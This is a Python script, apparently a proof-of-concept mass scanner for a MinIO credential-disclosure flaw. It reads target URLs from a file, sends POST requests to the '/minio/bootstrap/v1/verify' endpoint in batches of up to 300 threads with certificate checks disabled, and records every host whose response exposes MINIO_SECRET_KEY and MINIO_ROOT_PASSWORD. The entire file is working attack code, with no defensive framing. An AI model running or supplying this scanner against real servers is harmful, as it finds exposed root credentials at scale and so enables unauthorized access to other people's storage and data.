import threading
import requests
import urllib3

timeout = 5
max_threads = 300
requests.DEFAULT_RETRIES = 5
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def poc(url):
    if not url.startswith('http'):
        url = 'http://' + url.strip()
    target_url = url.strip() + "/minio/bootstrap/v1/verify"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"}
    data=""
    try:
        response = requests.post(target_url, headers=headers, timeout=timeout,data=data,verify=False)
        s = requests.session()
        s.keep_alive = False
        if response.status_code == 200 and ("MINIO_SECRET_KEY" in response.text) and ("MINIO_ROOT_PASSWORD" in response.text):
            with open('results.txt', 'a') as f:
                f.write(target_url + "\n")
                print("Found a vulnerable URL: {}".format(target_url))
    except requests.exceptions.RequestException as e:
        print("Failed to connect to {}: {}".format(target_url, e))
        
# read urls from txt file
with open('urls.txt', 'r') as f:
    urls = f.readlines()

# create a thread for each url
threads = []
for url in urls:
    t = threading.Thread(target=poc, args=(url,))
    threads.append(t)

    if len(threads) >= max_threads:
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        threads = []

for t in threads:
    t.start()

for t in threads:
    t.join()